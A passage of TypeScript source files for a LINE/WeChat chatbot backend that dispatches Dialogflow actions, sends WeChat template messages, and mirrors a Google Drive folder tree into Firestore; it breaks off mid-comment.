 * Central dispatcher: routes a matched Dialogflow action (or postback
 * action) to its handler and replies to the user.
 *
 * Two dispatch styles coexist: the first group of cases returns the
 * handler's promise immediately; the remaining cases accumulate messages
 * into `lineMessage`, which is pushed once after the switch.
 *
 * @param lineId - LINE/WeChat user id
 * @param action - matched action name (from Dialogflow or postback data)
 * @param dataResult - Dialogflow query result or postback payload
 */
export const actionSubscriber = async (lineId: string, action: string, dataResult: any) => {
    // dataResult from dialogflow result or postback data
    let lineMessage = new Array
    const response = dataResult.fulfillmentText
    const parameters: any = structProtoToJson(dataResult.parameters)
    // let results = getResultFromParameters(parameters)
    const userId = lineId
    // sendToBigQuery(lineId, userName, divsionName, action)
    console.log(`[${dataResult.queryText}] matches [${action}] in actionSubscriber`)
    // console.log(JSON.stringify(dataResult, null, 2))
    switch (action) {
        // Early-return handlers: each pushes its own reply and logs its own errors.
        case 'userRegistration':
            return userRegistration(lineId).catch(error => console.log("%s userRegistration error:", lineId, error))
        case 'unMatchOnce':
            return unMatchOnce(lineId).catch(error => console.log("%s unMatchOnce error:", lineId, error))
        case 'unMatchTwice':
            return unMatchTwice(lineId).catch(error => console.log("%s unMatchTwice error:", lineId, error))
        case 'dialogFlowError':
            return dialogFlowError(lineId).catch(error => console.log("%s dialogFlowError error:", lineId, error))
        case 'menu':
            return menuAction(lineId, dataResult).catch(error => console.log("%s menuAction error:", lineId, error))
        // Accumulating handlers: queue a text message, pushed after the switch.
        case 'flightInfo':
            lineMessage.push(lineServices.textMessage("我們已收到您的回覆"))
            // setDialogflowEvent(userId, "askForDepartDate", {})
            break
        case 'attend':
            lineMessage.push(lineServices.textMessage("感謝您的參與,稍後將與您聯繫"))
            break
        case 'absent':
            lineMessage.push(lineServices.textMessage("感謝您的回覆,期待您下次的參與"))
            break
        // The flight-info follow-up prompts all echo Dialogflow's fulfillment text.
        case "askForDepartDate":
            lineMessage.push(lineServices.textMessage(response))
            break
        case "askForDepartFlight":
            lineMessage.push(lineServices.textMessage(response))
            break
        case "askForDepartPlace":
            lineMessage.push(lineServices.textMessage(response))
            break
        case "askForDepartTime":
            lineMessage.push(lineServices.textMessage(response))
            break
        case "askForArrivePlace":
            lineMessage.push(lineServices.textMessage(response))
            break
        case "askForArriveTime":
            lineMessage.push(lineServices.textMessage(response))
            break
        case "askForPickUp":
            lineMessage.push(lineServices.textMessage(response))
            break
        default:
            // Anything unmatched falls through to the free-text handler.
            return dialogflowFulfillmentText(lineId, dataResult).catch(error => console.log("%s dialogflowFulfillmentText error:", lineId, error))
    }
    // NOTE(review): this push is intentionally not awaited; failures are only
    // visible through the line service's own logging.
    lineServices.pushMessage(userId, lineMessage)
}
// module.exports = router;<file_sep>/src/services/messageTemplateService.ts
import * as admin from 'firebase-admin';
import { MessageTemplate } from '../model';
// Firestore collection backing message templates (collection name "Message").
const messageTemplateCollection = admin.firestore().collection("Message");
// Merge-upserts a message template document keyed by its id.
export const setMessageTemplate = (message: MessageTemplate) =>
    messageTemplateCollection.doc(message.id).set(message, { merge: true })
// Loads a template by id; resolves to null when the document does not exist.
export const getMessageTemplate = (id: string) =>
    messageTemplateCollection.doc(id).get().then(snapshot =>
        snapshot.exists ? snapshot.data() as MessageTemplate : null)
// Queries templates whose content field matches exactly.
export const getMessageTemplateByContent = (content: string) =>
    messageTemplateCollection.where("content", "==", content).get()
export const deleteMessageTemplate = (id: string) => {
return messageTemplateCollection.doc(id).delete()
}<file_sep>/src/services/wechatService.ts
import Axios from "axios"
import * as Cache from "node-cache"
import { uriName, wechatAccount, textTemplateId, fileTemplateId, generalTemplateId, backendUrl } from "../config"
import { Member, File, MessageTemplate } from "../model"
import * as Moment from "moment-timezone"
import * as opencc from "node-opencc"
// In-memory cache for the WeChat access token (TTL 7000s, < WeChat's 7200s expiry).
const cache = new Cache({ stdTTL: 7000, checkperiod: 0 })
// Payload shape for WeChat's template/send endpoint.
type TemplateMessage = {
    touser: string
    template_id: string
    url?: string
    data: any
}
// Payload shape for WeChat's message/custom/send endpoint; the field
// matching `msgtype` is the one expected to be populated.
type CustomMessage = {
    touser: string
    msgtype: string
    text?: {
        content: string
    }
    image?: any
    video?: any
    music?: any
    news?: any
}
export const pushTemplateMessage = async (wechatMessage: TemplateMessage): Promise<any> => {
const accessToken = await getAccessToken()
const apiUrl = "https://api.weixin.qq.com/cgi-bin/message/template/send?access_token=" + accessToken
return Axios.post(apiUrl, wechatMessage).then(result => {
console.log(result.data)
const errorCode = result.data.errcode as number
if (errorCode > 0)
return Promise.reject(result.data.errmsg)
return Promise.resolve("ok")
}).catch(error => {
console.log(error)
return Promise.reject(error)
})
}
export const pushCustomMessage = async (wechatMessage: CustomMessage): Promise<any> => {
const accessToken = await getAccessToken()
const apiUrl = "https://api.weixin.qq.com/cgi-bin/message/custom/send?access_token=" + accessToken
return Axios.post(apiUrl, wechatMessage).then(result => {
console.log(result.data)
const errorCode = result.data.errcode as number
if (errorCode > 0)
return Promise.reject(result.data.errmsg)
return Promise.resolve("ok")
}).catch(error => {
console.log(error)
return Promise.reject(error)
})
}
// Sends template messages strictly one at a time, awaiting each send
// before starting the next.
export const pushTemplateMessages = async (wechatMessages: Array<TemplateMessage>): Promise<any> => {
    for (let index = 0; index < wechatMessages.length; index++) {
        await pushTemplateMessage(wechatMessages[index])
    }
}
// export const toTemplateMessages = (sender: Member, trackId: string, receiver: Member, message?: string, files?: File[]): Array<TemplateMessage> | null => {
// const wechatMessages = []
// if (message) {
// const urls = getURLfromString(message)
// if (urls) {
// message = message.replace(urls[0], "")
// }
// // let wechatMessage: TemplateMessage = {
// // touser: receiver.wechatId,
// // template_id: textTemplateId,
// // data: {
// // sender: {
// // value: sender.name,
// // color: "#000000"
// // },
// // content: {
// // value: message,
// // color: "#000000"
// // }
// // }
// // }
// let eventTime = new Date()
// // eventTime.setHours(eventTime.getHours() + 8) // if on Cloud
// const time = Moment(eventTime)
// let wechatMessage: TemplateMessage = {
// touser: receiver.wechatId,
// template_id: generalTemplateId,
// data: {
//
// keyword1: {
// value: "訊息",
// color: "#000000"
// },
// keyword2: {
// value: message,
// color: "#000000"
// },
// keyword3: {
// value: `${time.format("YYYY-MM-DD hh:mm:ss")}`,
// color: "#173177"
// }
// }
// }
// if (urls)
// wechatMessage.url = backendUrl + "urlRedirect?trackId=" + trackId + "&url=" + urls[0]
// if (sender.path) {
// wechatMessage.data.path = {
// value: sender.path,
// color: "#000000"
// }
// }
// wechatMessages.push(wechatMessage)
// }
// if (files) {
// for (const file of files) {
// wechatMessages.push({
// touser: receiver.wechatId,
// template_id: generalTemplateId,
// url: `${uriName}pdf/${file.id}/${trackId}`,
// data: {
// keyword2: {
// value: file.name,
// color: "#000000"
// }
// }
// })
// }
// }
// return wechatMessages.length > 0 ? wechatMessages : null
// }
/**
 * Builds WeChat template messages for a broadcast: one message for the text
 * body (if any), one per file attachment (wrapped in an online document
 * viewer URL), and one for an optional thumbnail image.
 *
 * @param sender - message author; sender.path (when present) is added to the template data
 * @param channelId - receiver's WeChat id (template "touser")
 * @param message - optional text body; converted to simplified Chinese
 * @param storageUrls - optional attachments (name + storage URL)
 * @param thumb - optional image URL rendered as a "圖片" entry
 * @returns the built messages, or null when nothing was produced
 */
export const toTemplateMessagesMQ = (sender: Member, channelId: string, message?: string, storageUrls?: MessageTemplate["urls"], thumb?: string): Array<TemplateMessage> | null => {
    const wechatMessages = []
    let eventTime = new Date()
    // eventTime.setHours(eventTime.getHours() + 8) // if on Cloud
    const time = Moment(eventTime)
    if (message) {
        // A URL embedded in the text is stripped from the body and used as
        // the template's tap-through link instead.
        const urls = getURLfromString(message)
        if (urls) {
            message = message.replace(urls[0], "")
        }
        let wechatMessage: TemplateMessage = {
            touser: channelId,
            template_id: generalTemplateId,
            data: {
                keyword1: {
                    value: `訊息`,
                    color: "#000000"
                },
                keyword2: {
                    value: opencc.traditionalToSimplified(message),
                    color: "#000000"
                },
                keyword3: {
                    value: `${time.format("YYYY-MM-DD HH:mm:ss")}`,
                    color: "#173177"
                }
            }
        }
        if (urls && urls.length > 0) {
            wechatMessage.url = urls[0]
        }
        // wechatMessage.url = backendUrl + "urlRedirect?trackId=" + trackId + "&url=" + urls[0]
        if (sender.path) {
            wechatMessage.data.path = {
                value: sender.path,
                color: "#000000"
            }
        }
        wechatMessages.push(wechatMessage)
    }
    if (storageUrls) {
        for (const storageUrl of storageUrls) {
            // Office documents open via the Office web viewer, PDFs via the
            // Google Docs viewer; other file types link directly.
            let viewerUrl: string = encodeURI(decodeURI(storageUrl.url))
            switch (viewerUrl.substring(viewerUrl.lastIndexOf(".") + 1, viewerUrl.length).toLowerCase()) {
                case "pptx":
                case "ppt":
                case "docx":
                case "doc":
                case "xlsx":
                case "xls":
                    viewerUrl = "https://view.officeapps.live.com/op/embed.aspx?src=" + viewerUrl
                    break
                case "pdf":
                    viewerUrl = "https://docs.google.com/viewerng/viewer?url=" + viewerUrl
                    break
                default:
                    break
            }
            wechatMessages.push({
                touser: channelId,
                template_id: generalTemplateId,
                url: `${viewerUrl}`,
                data: {
                    keyword1: {
                        value: "檔案",
                        color: "#000000"
                    },
                    keyword2: {
                        value: storageUrl.name,
                        color: "#000000"
                    },
                    keyword3: {
                        value: `${time.format("YYYY-MM-DD HH:mm:ss")}`,
                        color: "#173177"
                    }
                }
            })
        }
    }
    if (thumb && thumb != "") {
        wechatMessages.push({
            touser: channelId,
            template_id: generalTemplateId,
            url: `${encodeURI(decodeURI(thumb))}`,
            data: {
                keyword1: {
                    value: "圖片",
                    color: "#000000"
                },
                keyword2: {
                    value: "公告",
                    color: "#000000"
                },
                keyword3: {
                    value: `${time.format("YYYY-MM-DD HH:mm:ss")}`,
                    color: "#173177"
                }
            }
        })
    }
    return wechatMessages.length > 0 ? wechatMessages : null
}
/**
 * Builds a WeChat custom text message: converts the body to simplified
 * Chinese and replaces each hyperlink key with an <a> tag around it.
 */
export const toCustomTextMessage = (receiver: Member, message: string, hyperlinks?: Array<{ key: string, url: string }>) => {
    let content = opencc.traditionalToSimplified(message)
    if (hyperlinks) {
        hyperlinks.forEach(link => {
            content = content.replace(link.key, `<a href="${link.url}">${link.key}</a>`)
        })
    }
    return {
        touser: receiver.wechatId,
        msgtype: "text",
        text: { content }
    }
}
// Wraps a file reference in a single-article "news" message.
// NOTE(review): the url below is a literal placeholder string — presumably
// meant to be replaced with a real download link; confirm before relying on it.
export const toFileMessage = (receiver: Member, file: File) => ({
    touser: receiver.wechatId,
    msgtype: "news",
    news: {
        articles: [{
            title: "檔案",
            description: file.name,
            url: "<http://file url>"
        }]
    }
})
// Canned "smart query" usage hint delivered as a plain text message.
export const toSmartQueryMessage = (receiver: Member) => ({
    touser: receiver.wechatId,
    msgtype: "text",
    text: {
        content: "《智慧查詢》\n\n請依序說出查詢條件(公司/地區/部門)以快速去得聯絡資訊"
    }
})
const getAccessToken = async (): Promise<string> => {
const apiUrl = `https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid=${wechatAccount.id}&secret=${wechatAccount.secret}`
let token = ""
try {
token = cache.get("accessToken") as string
} catch{
console.log("Existing WechatToken: empty", token)
}
if (token != undefined && token != "") {
console.log("Existing WechatToken: ", token)
return token
}
return Axios.get(apiUrl).then(result => {
token = result.data.access_token
console.log("Get WechatToken: ", token)
cache.set("accessToken", token, 7000)
return token
})
}
// Returns the exec() match array for the first URL-like substring in
// `message` (index 1 holds the optional path group), or null when none is
// found. A fresh regex literal is used per call, so the /g lastIndex state
// never leaks between invocations.
const getURLfromString = (message: string): string[] | null =>
    /[-a-zA-Z0-9@:%_\+.~#?&//=]{2,256}\.[a-z]{2,4}\b(\/[-a-zA-Z0-9@:%_\+.~#?&//=]*)?/gi.exec(message)
<file_sep>/src/services/groupMessageService.ts
import * as admin from 'firebase-admin';
import { BatchGroup } from '../model';
// Firestore collection backing broadcast groups (collection name "GroupMessage").
const batchGroupCollection = admin.firestore().collection("GroupMessage");
// Queries group documents whose id field equals the given id.
export const getBatchGroupById = (id: string) =>
    batchGroupCollection.where("id", "==", id).get()
// Queries group documents whose name field equals the given name.
export const getBatchGroupByName = (name: string) =>
    batchGroupCollection.where("name", "==", name).get()
/**
 * Merge-upserts a group document keyed by its id.
 * (Local parameter renamed from the copy-pasted `member` — it is a BatchGroup.)
 */
export const setBatchGroup = function (group: BatchGroup) {
    return batchGroupCollection.doc(group.id).set(group, { merge: true })
}
// Deletes the group document with the given id.
export const deleteBatchGroup = (id: string) =>
    batchGroupCollection.doc(id).delete()
import { google } from "googleapis"
import { OAuth2Client } from "google-auth-library"
import * as admin from 'firebase-admin';
import { google_client_secret_drive, drive_token } from "../config"
import { File } from '../model'
import * as mime from "mime"
// Node filesystem module (CommonJS require kept to match the file's style);
// `const` replaces the legacy `var` since the binding is never reassigned.
const fs = require('fs');
// Merge-upserts a drive file record into the File collection, keyed by id.
const addFile = (file: File): Promise<any> =>
    admin.firestore().collection("File").doc(file.id).set(file, { merge: true })
// Stamps only the modifiedDate field of an existing file record.
const addNowProperty = (file: File, now: number): Promise<any> =>
    admin.firestore().collection("File").doc(file.id).set({ modifiedDate: now }, { merge: true })
// Fetches every document in the File collection.
export const getFiles = () => admin.firestore().collection("File").get()
// Fetches only folder records (Google Drive folder mimeType).
export const getFolders = () =>
    admin.firestore().collection("File").where("mimeType", "==", "application/vnd.google-apps.folder").get()
// Queries file records whose name field matches exactly.
export const getFileByName = (fileName: string) =>
    admin.firestore().collection("File").where("name", "==", fileName).get()
// Fetches a single file record by its document id.
export const getFileById = (id: string) =>
    admin.firestore().collection("File").doc(id).get()
// Queries file records whose parents field equals the given folder id.
export const getFilesByParentId = (id: string) =>
    admin.firestore().collection("File").where("parents", "==", id).get()
/**
 * Merge-upserts a file record. Records flagged with the sentinel
 * modifiedDate 9999999999999 are keyed by their Drive docId; all others
 * are keyed by their id.
 *
 * (The original kept a `docId` local that was assigned but never read —
 * removed as dead code; behavior is unchanged.)
 *
 * @param file - the record to persist
 */
export const rename = (file: File): Promise<any> => {
    const key = file.modifiedDate == 9999999999999 ? file.docId : file.id
    return admin.firestore().collection("File").doc(key).set(file, { merge: true })
}
// Deletes the file record with the given document id.
export const deleteFileById = (id: string) =>
    admin.firestore().collection("File").doc(id).delete()
// Merge-upserts a file record keyed by its Drive docId (used when updating path info).
export const setFilePath = (file) =>
    admin.firestore().collection("File").doc(file.docId).set(file, { merge: true })
/**
 * Builds an OAuth2 client preloaded with the stored drive credentials.
 * The work is synchronous; the result is wrapped in a resolved promise to
 * keep the async interface callers expect.
 */
export const authorize = (): Promise<OAuth2Client> => {
    const installed = google_client_secret_drive.installed
    const client = new OAuth2Client(
        installed.client_id,
        installed.client_secret,
        installed.redirect_uris[0]
    )
    client.setCredentials({
        access_token: drive_token.access_token,
        token_type: drive_token.token_type,
        refresh_token: drive_token.refresh_token,
        expiry_date: drive_token.expiry_date
    })
    return Promise.resolve(client)
}
/**
 * Recursively stamps every non-trashed Drive file under `parentId` with
 * modifiedDate = `now` in Firestore (marks records as seen by the current
 * sync pass so stale ones can be purged later).
 *
 * @param auth - authorized OAuth2 client
 * @param parentId - Drive folder id to walk
 * @param now - timestamp to stamp on each record
 * @returns resolves (with no value) once the subtree has been processed
 */
export const addNowToFile = (auth: OAuth2Client, parentId: string, now: number): Promise<string> => {
    return new Promise((resolve, reject) => {
        const drive = google.drive({ version: 'v3', auth });
        drive.files.list({
            q: `'${parentId}' in parents and trashed = false`,
            fields: 'nextPageToken, files(id, name,parents,mimeType)',
        }, async (err, { data }) => {
            if (err) {
                console.error("err:", err.response);
                return reject(err.response.data)
            }
            const files = data.files;
            if (files.length > 0) {
                for (const file of files) {
                    file["modifiedDate"] = now
                    await addNowProperty(file, now)
                    // Recurse into subfolders; per-folder errors are logged and skipped
                    // so one bad subtree does not abort the whole pass.
                    if (file.mimeType == "application/vnd.google-apps.folder") {
                        try {
                            await addNowToFile(auth, file.id, now)
                        } catch (err) {
                            console.log(err)
                        }
                    }
                }
            } else {
                console.log('An empty folder found.');
            }
            resolve()
        })
    })
}
/**
 * Recursively mirrors a Drive folder tree into the Firestore File
 * collection: parses an optional numeric "NN." sort prefix out of each
 * name into `sid`, strips file extensions from non-folders, records the
 * ancestry chain, and stamps every record with modifiedDate = `now` so
 * stale records can be purged after the pass.
 *
 * @param auth - authorized OAuth2 client
 * @param parentId - Drive folder id to list
 * @param parentsName - ancestry chain ({fullName, name, id}) of parentId
 * @param now - sync timestamp stamped on every record
 * @param pageToken - Drive paging cursor for continuation calls
 */
export const listFiles = (auth: OAuth2Client, parentId: string, parentsName: any[], now: number, pageToken?: string): Promise<string> => {
    return new Promise((resolve, reject) => {
        // console.log("Pid:", parentId);
        const drive = google.drive({ version: 'v3', auth });
        drive.files.list({
            q: `'${parentId}' in parents and trashed = false`,
            fields: 'nextPageToken, files(id, name,parents,mimeType, createdTime, modifiedTime)',
            pageToken: pageToken
        }, async (err, response) => {
            if (err || !response.data) {
                console.error("err:", err.response);
                return reject(err.response.data)
            } else {
                const files: File[] = response.data.files;
                if (files && files.length > 0) {
                    // console.log('Number of Files in ', parentId + " is " + files.length);
                    let fullName = ""
                    for (const file of files) {
                        fullName = file.name
                        file.fullName = file.name
                        file["docId"] = file.id
                        // Parse an optional leading "NN." sort prefix into sid;
                        // names like "3.Title.ext" (two dots) and numbered folders
                        // keep the prefix-stripped display name.
                        if (file.name.indexOf(".") != -1) {
                            if (!isNaN(Number(file.name.substring(0, file.name.indexOf("."))))) {
                                if ((fullName.match(/\./g) || []).length == 2) {
                                    file.sid = parseInt(file.name.substring(0, file.name.indexOf(".")))
                                    file.name = file.name.substring(file.name.indexOf(".") + 1, file.name.length)
                                } else {
                                    if (file.mimeType == "application/vnd.google-apps.folder") {
                                        file.sid = parseInt(file.name.substring(0, file.name.indexOf(".")))
                                        file.name = file.name.substring(file.name.indexOf(".") + 1, file.name.length)
                                    } else {
                                        file.sid = 0
                                    }
                                }
                            } else {
                                // console.log("No sid:", file.name.substring(0, file.name.indexOf(".")))
                                file.sid = 0
                            }
                        } else {
                            // console.log("No sid:", file.name.substring(0, file.name.indexOf(".")))
                            file.sid = 0
                        }
                        // Non-folders: drop the file extension from the display name.
                        if (file.mimeType != "application/vnd.google-apps.folder") {
                            if (file.name.lastIndexOf(".") != -1) {
                                // console.log("Has file ext:", file.name.lastIndexOf("."))
                                file.name = file.name.substring(0, file.name.lastIndexOf("."))
                            } else {
                                // console.log("No file ext:", file.name.indexOf("."))
                            }
                        }
                        file.parentsName = parentsName
                        file.modifiedDate = now
                        file.parents = file.parents[0]
                        file.createdTime = new Date(file.createdTime).getTime()
                        file.modifiedTime = new Date(file.modifiedTime).getTime()
                        // "SBSE____" is a sentinel name excluded from the mirror.
                        if (file.name != "SBSE____") {
                            await addFile(file)
                        }
                        if (file.mimeType == "application/vnd.google-apps.folder") {
                            try {
                                let pName = file.parentsName.slice()
                                pName.push({ fullName: fullName, name: file.name, id: file.id })
                                await listFiles(auth, file.id, pName, now)
                            } catch (err) {
                                console.log(err)
                            }
                            // folders.push(file)
                        }
                    }
                    // Continue with the next Drive results page, if any.
                    if (response.data.nextPageToken) {
                        await listFiles(auth, parentId, parentsName, now, response.data.nextPageToken)
                    }
                } else {
                    console.log('No files found.');
                }
                resolve()
            }
        });
    })
}
/**
 * Creates an empty Google-Apps file or folder in Drive under `path`, then
 * mirrors the new record (with parsed sid/name and parent ancestry) into
 * the Firestore File collection via rename().
 *
 * @param auth - authorized OAuth2 client
 * @param name - full display name (may carry a leading "NN." sort prefix)
 * @param path - Drive id of the parent folder
 * @param type - Google-Apps type suffix (e.g. "folder", "document")
 * @param now - sync timestamp stamped on the record
 * @returns resolves with the new Drive file id
 */
export const createFile = (auth: OAuth2Client, name: string, path: string, type: string, now: number): Promise<string> => {
    return new Promise((resolve, reject) => {
        const drive = google.drive({ version: 'v3', auth });
        let fileDBRec: File = { id: "", docId: "", sid: 0, mimeType: "", modifiedDate: 0, name: "", fullName: "", parents: "", parentsName: [], modifiedTime: 0, createdTime: 0 }
        let parentName = []
        let fileMetadata = {
            'name': name,
            'mimeType': `application/vnd.google-apps.${type}`,
            parents: [path]
        };
        // NOTE(review): this expression's result is unused — appears to be leftover.
        name.substring(name.lastIndexOf(".") + 1, name.length)
        drive.files.create({
            resource: fileMetadata,
            fields: 'id'
        }, async function (err, file) {
            if (err) {
                // Handle error
                console.error("err:", err.response);
                reject("err")
            } else {
                console.log(`${type} Id: ${file.data.id} ${name} ${path} ${type}`);
                // Extend the parent's ancestry chain with the parent itself.
                await getFileById(path).then(async doc => {
                    if (doc.exists) {
                        parentName = doc.data().parentsName.slice()
                        parentName.push({ fullName: doc.data().fullName, name: doc.data().name, id: path })
                    }
                })
                fileDBRec["fullName"] = name
                fileDBRec["name"] = name
                fileDBRec["docId"] = file.data.id
                fileDBRec["id"] = file.data.id
                fileDBRec["parents"] = path
                fileDBRec["mimeType"] = `application/vnd.google-apps.${type}`
                fileDBRec["parentsName"] = parentName
                fileDBRec["modifiedDate"] = now
                // Same "NN." sort-prefix parsing as listFiles.
                if (fileDBRec.name.indexOf(".") != -1) {
                    if (!isNaN(Number(fileDBRec.name.substring(0, fileDBRec.name.indexOf("."))))) {
                        if ((name.match(/\./g) || []).length == 2) {
                            fileDBRec["sid"] = parseInt(fileDBRec.name.substring(0, fileDBRec.name.indexOf(".")))
                            fileDBRec["name"] = fileDBRec.name.substring(fileDBRec.name.indexOf(".") + 1, fileDBRec.name.length)
                        } else {
                            if (fileDBRec.mimeType == "application/vnd.google-apps.folder") {
                                fileDBRec["sid"] = parseInt(fileDBRec.name.substring(0, fileDBRec.name.indexOf(".")))
                                fileDBRec["name"] = fileDBRec.name.substring(fileDBRec.name.indexOf(".") + 1, fileDBRec.name.length)
                            } else {
                                fileDBRec["sid"] = 0
                            }
                        }
                    } else {
                        // console.log("No sid:",.name.substring(0, .name.indexOf(".")))
                        fileDBRec["sid"] = 0
                    }
                } else {
                    // console.log("No sid:",.name.substring(0, .name.indexOf(".")))
                    fileDBRec["sid"] = 0
                }
                // Non-folders: drop the file extension from the display name.
                if (fileDBRec.mimeType != "application/vnd.google-apps.folder") {
                    if (fileDBRec.name.lastIndexOf(".") != -1) {
                        // console.log("Has ext:", .name.lastIndexOf("."))
                        fileDBRec["name"] = fileDBRec.name.substring(0, fileDBRec.name.lastIndexOf("."))
                    } else {
                        // console.log("No ext:",.name.indexOf("."))
                    }
                }
                console.log("fileDBRec:", fileDBRec)
                await rename(fileDBRec)
                resolve(file.data.id);
            }
        });
    })
}
/**
 * Uploads a file to Drive under `path`, streaming its content from the
 * local temp file 'fileTemp' with a mime type derived from the name's
 * extension, then mirrors the new record into the Firestore File
 * collection via rename().
 *
 * @param auth - authorized OAuth2 client
 * @param name - full file name including extension (may carry a "NN." prefix)
 * @param path - Drive id of the parent folder
 * @param type - label used only for logging here
 * @param now - sync timestamp stamped on the record
 * @returns resolves with the new Drive file id
 */
export const createFileWithFile = (auth: OAuth2Client, name: string, path: string, type: string, now: number): Promise<string> => {
    return new Promise((resolve, reject) => {
        const drive = google.drive({ version: 'v3', auth });
        let fileDBRec: File = {
            name: "", sid: 0, fullName: "", parents: "", parentsName: [], id: "", docId: "", mimeType: "", modifiedDate: 0, modifiedTime: 0, createdTime: 0
        }
        let parentName = []
        var fileMetadata = {
            'name': name,
            parents: [path]
        };
        console.log("fileContent:", " " + mime.getType(name.substring(name.lastIndexOf(".") + 1, name.length)))
        // Upload body: the previously staged local temp file 'fileTemp'.
        var media = {
            mimeType: mime.getType(name.substring(name.lastIndexOf(".") + 1, name.length)),
            body: fs.createReadStream('fileTemp')
        };
        drive.files.create({
            resource: fileMetadata,
            media: media,
            fields: 'id'
        }, async function (err, file) {
            if (err) {
                // Handle error
                console.error("err:", err.response);
                reject("err")
            } else {
                console.log(`${type} Id: ${file.data.id} ${name} ${path} ${type}`);
                // Extend the parent's ancestry chain with the parent itself.
                await getFileById(path).then(async doc => {
                    if (doc.exists) {
                        parentName = doc.data().parentsName.slice()
                        parentName.push({ fullName: doc.data().fullName, name: doc.data().name, id: path })
                    }
                })
                fileDBRec["fullName"] = name
                fileDBRec["name"] = name
                fileDBRec["docId"] = file.data.id
                fileDBRec["id"] = file.data.id
                fileDBRec["parents"] = path
                fileDBRec["mimeType"] = mime.getType(name.substring(name.lastIndexOf(".") + 1, name.length)).toString()
                fileDBRec["parentsName"] = parentName
                fileDBRec["modifiedDate"] = now
                // Same "NN." sort-prefix parsing as listFiles.
                if (fileDBRec.name.indexOf(".") != -1) {
                    if (!isNaN(Number(fileDBRec.name.substring(0, fileDBRec.name.indexOf("."))))) {
                        if ((name.match(/\./g) || []).length == 2) {
                            fileDBRec["sid"] = parseInt(fileDBRec.name.substring(0, fileDBRec.name.indexOf(".")))
                            fileDBRec["name"] = fileDBRec.name.substring(fileDBRec.name.indexOf(".") + 1, fileDBRec.name.length)
                        } else {
                            if (fileDBRec.mimeType == "application/vnd.google-apps.folder") {
                                fileDBRec["sid"] = parseInt(fileDBRec.name.substring(0, fileDBRec.name.indexOf(".")))
                                fileDBRec["name"] = fileDBRec.name.substring(fileDBRec.name.indexOf(".") + 1, fileDBRec.name.length)
                            } else {
                                fileDBRec["sid"] = 0
                            }
                        }
                    } else {
                        // console.log("No sid:",.name.substring(0, .name.indexOf(".")))
                        fileDBRec["sid"] = 0
                    }
                } else {
                    // console.log("No sid:",.name.substring(0, .name.indexOf(".")))
                    fileDBRec["sid"] = 0
                }
                // Non-folders: drop the file extension from the display name.
                if (fileDBRec.mimeType != "application/vnd.google-apps.folder") {
                    if (fileDBRec.name.lastIndexOf(".") != -1) {
                        // console.log("Has ext:", .name.lastIndexOf("."))
                        fileDBRec["name"] = fileDBRec.name.substring(0, fileDBRec.name.lastIndexOf("."))
                    } else {
                        // console.log("No ext:",.name.indexOf("."))
                    }
                }
                console.log("fileDBRec:", fileDBRec)
                await rename(fileDBRec)
                resolve(file.data.id);
            }
        });
    })
}
/**
 * Purges File records not touched by the current sync pass: everything
 * with modifiedDate < now is fed, batch by batch, to deleteQueryBatch
 * (which additionally filters on rootFolderId).
 */
export const deleteFilesForSync = (batchSize: number, now: number, rootFolderId: string) => {
    const staleQuery = admin.firestore().collection("File")
        .where("modifiedDate", "<", now)
        .orderBy('modifiedDate')
    return new Promise((resolve, reject) => {
        deleteQueryBatch(staleQuery, batchSize, resolve, reject, now, rootFolderId);
        console.log("deleteFilesForSync")
    });
}
/**
 * Deletes one Firestore batch (capped at 500 writes) of stale File records
 * matching `query`: only docs that have a parentsName chain, whose
 * modifiedDate differs from `now`, and whose root ancestor is
 * rootFolderId are removed.
 *
 * NOTE(review): as written, the value passed to the final .then is always
 * 0 (both the empty-snapshot branch and batch.commit() resolve to 0), so
 * the promise resolves after a single batch and the process.nextTick
 * recursion appears unreachable — confirm whether multi-batch deletion was
 * intended.
 *
 * @param query - Firestore query selecting candidate stale records
 * @param batchSize - accepted for interface compatibility (limit is the hard-coded 500)
 * @param resolve/reject - settle callbacks of the caller's wrapper promise
 * @param now - current sync timestamp; records stamped with it are kept
 * @param rootFolderId - only records rooted at this folder are deleted
 */
export const deleteQueryBatch = async (query, batchSize, resolve, reject, now, rootFolderId) => {
    query.get()
        .then(async (snapshot) => {
            // When there are no documents left, we are done
            if (snapshot.size == 0) {
                console.log("snapshot.size")
                return 0;
            }
            // Delete documents in a batch
            var batch = admin.firestore().batch();
            var numberLimit = 0
            snapshot.docs.forEach(async doc => {
                // Firestore batches allow at most 500 operations.
                if (doc.data().hasOwnProperty('parentsName') && numberLimit < 500) {
                    if (doc.data().parentsName.length > 0) {
                        if (doc.data().modifiedDate != now && doc.data().parentsName[0].id == rootFolderId) {
                            console.log("deleted file:", doc.data().name + doc.data().modifiedDate + " " + now + " " + doc.data().parentsName[0].id + " " + rootFolderId);
                            batch.delete(doc.ref);
                            numberLimit++
                        }
                    }
                }
            });
            return batch.commit().then(() => {
                console.log("batch.commit()", numberLimit)
                return 0
            });
        }).then((numDeleted) => {
            if (numDeleted === 0) {
                console.log("numDeleted === 0")
                resolve();
                return;
            } else {
                console.log("Recurse on the next process tick")
            }
            process.nextTick(() => {
                deleteQueryBatch(query, batchSize, resolve, reject, now, rootFolderId);
            });
        })
        .catch(reject);
}
/**
 * Deletes a file's Firestore record and the records of its direct
 * children. The Drive API deletion remains intentionally disabled (as in
 * the original, which kept it commented out) — only Firestore records are
 * removed.
 *
 * Fix: the original fired the Firestore deletes without awaiting them
 * (`.then().catch(err => {})` and a floating child query), resolving
 * "file deleted" before any delete had actually completed. Deletes are now
 * awaited; individual failures are still best-effort (logged, not thrown).
 *
 * @param auth - kept for interface compatibility (unused while the Drive call is disabled)
 * @param fileId - id of the record to delete
 * @returns resolves with "file deleted" once all deletes have settled
 */
export const deleteFile = async (auth: OAuth2Client, fileId: string): Promise<string> => {
    await deleteFileById(fileId).catch(err => console.log("deleteFileById error:", err))
    await getFilesByParentId(fileId).then(async foldersSnapshot => {
        if (!foldersSnapshot.empty) {
            for (const folderDoc of foldersSnapshot.docs) {
                const folder = folderDoc.data()
                console.log("folder.id:", folder.id + " " + folder.name)
                await deleteFileById(folder.id).catch(err => console.log("deleteFileById error:", err))
            }
        }
    }).catch(err => console.log("getFilesByParentId error:", err))
    console.log(` Id: file deleted`);
    return "file deleted"
}
/**
 * Renames a file both in Firestore and in Drive. The Firestore record is
 * updated first (re-parsing the "NN." sort prefix into sid and preserving
 * the old extension on fullName for non-folders); renamed folders then
 * have their subtree re-listed so descendants pick up the change; finally
 * the Drive file itself is updated.
 *
 * @param auth - authorized OAuth2 client
 * @param fileId - id of the file to rename
 * @param fullName - new name without extension (extension is re-attached)
